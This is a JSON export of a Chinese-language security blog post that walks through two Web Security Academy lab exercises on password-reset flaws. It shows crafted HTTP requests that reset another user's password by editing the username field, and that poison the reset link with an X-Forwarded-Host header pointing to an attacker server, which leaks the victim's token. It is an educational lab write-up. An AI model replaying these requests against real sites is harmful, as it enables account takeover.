{"id":1531,"date":"2023-05-21T21:18:00","date_gmt":"2023-05-21T13:18:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1531"},"modified":"2024-05-23T20:40:49","modified_gmt":"2024-05-23T12:40:49","slug":"reseting-password","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1531","title":{"rendered":"Reseting Password"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u6709\u4e9b\u7528\u6236\u6703\u5fd8\u8a18\u5bc6\u78bc\uff0c\u56e0\u6b64\u7cfb\u7d71\u6703\u6709\u91cd\u8a2d\u5bc6\u78bc\u529f\u80fd\uff0c\u9019\u6709\u5e7e\u7a2e\u4e0d\u540c\u7684\u5be6\u4f5c\u65b9\u5f0f\uff0c\u800c\u4e14\u5b58\u5728\u4e0d\u540c\u7a0b\u5ea6\u7684\u91cd\u8a2d\u5bc6\u78bc\u6f0f\u6d1e\uff0c\u5e38\u767c\u751f\u7684\u5730\u65b9\u6709\u4ee5\u4e0b\u5169\u500b\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5728\u7db2\u9801\u66f4\u6539\u5bc6\u78bc<\/li>\n\n\n\n<li>\u7528Email\u66f4\u6539\u5bc6\u78bc<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u5728\u7db2\u9801\u91cd\u7f6e\u5bc6\u78bc<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f88\u591a\u7cfb\u7d71\u56e0\u70ba\u6c92\u6709\u7d81\u5b9a\u5e33\u865f\uff0c\u56e0\u6b64\u53ef\u4ee5\u5e6b\u4efb\u4f55\u4eba\u91cd\u6539\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u4e0b\u70ba\u4f7f\u7528\u8005carlos\u66f4\u6539\u81ea\u5df1\u5bc6\u78bc\u7684\u8acb\u6c42 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/forgot-password?temp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A\n...omit...\ntemp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A&amp;username=carlos&amp;new-password-1=abc&amp;new-password-2=abc<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u7531\u65bc\u7cfb\u7d71\u6c92\u6709\u505a\u4efb\u4f55\u904e\u6ffe\uff0c\u56e0\u6b64\u4f7f\u7528\u8005carlos\u53ef\u4ee5\u900f\u904eusername\u53c3\u6578\u6539\u4efb\u4f55\u4eba\u7684\u5bc6\u78bc\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/forgot-password?temp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A\n...omit...\ntemp-forgot-password-token=zJuIal6i3fZ42mtO6b10UFtvSuXo6c7A&amp;<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">username=admin<\/mark>&amp;new-password-1=abc&amp;new-password-2=abc<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u4e0a\u8acb\u6c42\u53ef\u8b93carlos\u76f4\u63a5\u66f4\u6539admin\u5bc6\u78bc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Password reset broken logic<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7528Email\u66f4\u6539\u5bc6\u78bc<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u80fd\u5077\u5230\u6539\u5bc6\u78bctoken\uff0c\u5c31\u80fd\u6539\u4efb\u610f\u4f7f\u7528\u8005\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6b63\u5e38\u6d41\u7a0b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u67d0\u7cfb\u7d71email\u6539\u5bc6\u78bc\u6d41\u7a0b\u5982\u4e0b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1. \u5982\u679cwiener\u60f3\u66f4\u6539\u5bc6\u78bc\u6703\u767c\u9001\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/forgot-password HTTP\/1.1\nHost: ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\n...omit...\nCookie: session=D3hW9m3Frhs79Gz574pETzcvvZOI4Yjl\n\ncsrf=xc9Bxe6exRqWazSU3fV6eyQulogqs2ch&amp;username=wiener<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">2.\u63a5\u8457wiener\u6703\u6536\u5230email\u9a57\u8b49\u4fe1\uff0c\u53ea\u8981\u8a2a\u554f\u9a57\u8b49\u9023\u7d50\u5c31\u53ef\u4ee5\u6539\u81ea\u5df1\u7684\u5bc6\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Please follow the link below to reset your password.\n\nhttps:&#47;&#47;ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\/forgot-password?temp-forgot-password-token=7U9xxpdcAdc6IxMQ6PwIuhbDRC9YYJQo<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u653b\u64ca\u65b9\u6cd5<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u65bc\u7cfb\u7d71\u76f8\u4fe1x-forwarded-host\u7684\u4f4d\u7f6e\uff0c\u56e0\u6b64\u6703\u628a\u91cd\u8981\u7684\u8cc7\u8a0a\u4e5f\u9001\u5230\u9019\u500b\u4f4d\u7f6e\uff0c\u53ea\u8981\u628a\u4f4d\u7f6e\u6539\u6210\u81ea\u5df1\uff0c\u5c31\u80fd\u770b\u5230\u91cd\u8981\u8cc7\u8a0a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1.\u4e00\u6a23\u5ef6\u7528\u4e4b\u524dwiener\u7684\u8acb\u6c42\uff0csession token\u4e0d\u8b8a\u4e00\u6a23\u4f7f\u7528wiener\u7684\uff0c\u4f46\u5c07username\u6539\u70ba\u53d7\u5bb3\u8005carlos\uff0c\u4e26\u589e\u52a0x-forwarded-host<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u53ef\u4ee5\u69cb\u9020\u4ee5\u4e0b\u653b\u64ca\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/forgot-password HTTP\/1.1\nHost: ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\n...omit...\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">X-Forwarded-Host: attackserver.web-security-academy.net<\/mark>\nCookie: session=D3hW9m3Frhs79Gz574pETzcvvZOI4Yjl\n\t\ncsrf=xc9Bxe6exRqWazSU3fV6eyQulogqs2ch&amp;<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">username=carlos<\/mark><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">2.\u5728\u653b\u64ca\u4e3b\u6a5f(attackserver.web-security-academy.net)\u7684access log\u6703\u770b\u5230\u4ee5\u4e0b\u65e5\u5fd7\uff0c\u53ef\u4ee5\u767c\u73fecarlos\u7684token\u986f\u793a\u5728\u4e0a\u9762<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>...omit...\n172.31.30.50    2020-09-17 01:54:53 +0000 \"GET %2fforgot-password%3ftemp-forgot-password-token%3<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">dXcqy8kyCDTMbQLuum1xqgLXXnkm8YqN7<\/mark> HTTP\/1.1\" 404\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">3.\u5728wiener\u4fe1\u7bb1\u88e1\u6703\u6536\u5230\u7cfb\u7d71\u5bc4\u4f86\u7684\u7684\u9a57\u8b49\u9023\u7d50<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Please follow the link below to reset your password.\n\nhttps:&#47;&#47;ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\/forgot-password?temp-forgot-password-token=F4wgrXujxQVH6SJuxqTDkMWiot93uVDn<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">4.\u5c07\u9a57\u8b49\u9023\u7d50\u7684token\u6539\u70bacarlos\u7684\u5982\u4e0b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>https:\/\/ac081f0e1ef832fe801c9a6b00c600e6.web-security-academy.net\/forgot-password?temp-forgot-password-token=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">dXcqy8kyCDTMbQLuum1xqgLXXnkm8YqN7<\/mark><\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8a2a\u554f\u8a72\u93c8\u7d50\u5f8c\u5c31\u53ef\u4fee\u6539carlos\u7684\u5bc6\u78bc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Password reset poisoning via middleware<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n","protected":false},"excerpt":{"rendered":"<p>\u6709\u4e9b\u7528\u6236\u6703\u5fd8\u8a18\u5bc6\u78bc\uff0c\u56e0\u6b64\u7cfb\u7d71\u6703\u6709\u91cd\u8a2d\u5bc6\u78bc\u529f\u80fd\uff0c\u9019\u6709\u5e7e\u7a2e\u4e0d\u540c\u7684\u5be6\u4f5c\u65b9\u5f0f\uff0c\u800c\u4e14\u5b58\u5728\u4e0d\u540c\u7a0b\u5ea6\u7684\u6f0f\u6d1e<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1531","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1301,"url":"https:\/\/systw.net\/note\/archives\/1301","url_meta":{"origin":1531,"position":0},"title":"Race conditions","author":"raymond","date":"2024 \u5e74 2 \u6708 1 \u65e5","format":false,"excerpt":"Race conditions\u70ba\u5e38\u898b\u7684\u6f0f\u6d1e\uff0c\u8207\u696d\u52d9\u908f\u8f2f\u7f3a\u9677\u6709\u5bc6\u5207\u95dc\u4fc2\u3002\u7576\u7db2\u7ad9\u5728\u6c92\u6709\u8db3\u5920\u4fdd\u8b77\u63aa\u65bd\u7684\u60c5\u6cc1\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1137,"url":"https:\/\/systw.net\/note\/archives\/1137","url_meta":{"origin":1531,"position":1},"title":"HOST header attack","author":"raymond","date":"2023 \u5e74 1 \u6708 20 \u65e5","format":false,"excerpt":"Host header\u7684\u76ee\u7684\u662f\u5e6b\u52a9\u8b58\u5225\u5ba2\u6236\u7aef\u60f3\u8981\u8207\u54ea\u500b\u5f8c\u7aef\u5143\u4ef6\u9032\u884c\u901a\u8a0a\uff0c\u7279\u5225\u662f\u540c\u4e00 IP \u4f4d\u5740\u5b58\u53d6\u591a\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1536,"url":"https:\/\/systw.net\/note\/archives\/1536","url_meta":{"origin":1531,"position":2},"title":"bypass brute-force lock","author":"raymond","date":"2023 \u5e74 5 \u6708 20 \u65e5","format":false,"excerpt":"\u9396\u5b9a\u5e33\u6236\u53ef\u4ee5\u63d0\u4f9b\u4e00\u5b9a\u7a0b\u5ea6\u7684\u4fdd\u8b77\uff0c\u9632\u6b62\u5c0d\u7279\u5b9a\u5e33\u6236\u9032\u884c\u6709\u91dd\u5c0d\u6027\u7684\u66b4\u529b\u7834\u89e3\uff0c\u4f46\u9084\u662f\u6709\u6a5f\u6703\u7e5e\u904e\u9396\u5b9a\u6a5f\u5236","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1335,"url":"https:\/\/systw.net\/note\/archives\/1335","url_meta":{"origin":1531,"position":3},"title":"Username enumeration","author":"raymond","date":"2023 \u5e74 4 \u6708 14 \u65e5","format":false,"excerpt":"\u4f7f\u7528\u8005\u540d\u7a31\u5217\u8209Username enumeration\u662f\u6307\u653b\u64ca\u8005\u80fd\u5920\u89c0\u5bdf\u7db2\u7ad9\u884c\u70ba\u7684\u8b8a\u5316\uff0c\u4ee5\u78ba\u5b9a\u7d66\u5b9a\u7684\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":401,"url":"https:\/\/systw.net\/note\/archives\/401","url_meta":{"origin":1531,"position":4},"title":"Cracking Password","author":"raymond","date":"2017 \u5e74 3 \u6708 19 \u65e5","format":false,"excerpt":"\u5bc6\u78bc\u653b\u64ca\u985e\u578b 1. \u7dda\u4e0a\u653b\u64ca\uff08Online Attacks\uff09 \u88ab\u52d5\u5f0f\u7dda\u4e0a\u653b\u64ca\uff08Passive Onl\u2026","rel":"","context":"\u5728\u300cConcept\u300d\u4e2d","block_context":{"text":"Concept","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/concept"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1516,"url":"https:\/\/systw.net\/note\/archives\/1516","url_meta":{"origin":1531,"position":5},"title":"Business Logic Vulnerabilities","author":"raymond","date":"2024 \u5e74 4 \u6708 1 \u65e5","format":false,"excerpt":"\u7528\u5408\u6cd5\u63a9\u98fe\u975e\u6cd5\uff0c\u90194\u7a2e\u696d\u52d9\u908f\u8f2f\u5b89\u5168\u6f0f\u6d1e\uff0c\u7a7f\u904e\u4fdd\u8b77\u6a5f\u5236\u5957\u5229\u63d0\u6b0a\u3002\u9019\u662f\u61c9\u7528\u7a0b\u5f0f\u8a2d\u8a08\u548c\u5be6\u4f5c\u4e2d\u5e38\u898b\u7684\u7f3a\u9677\uff0c\u5141\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1531","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1531"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1531\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1531"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1531"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1531"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}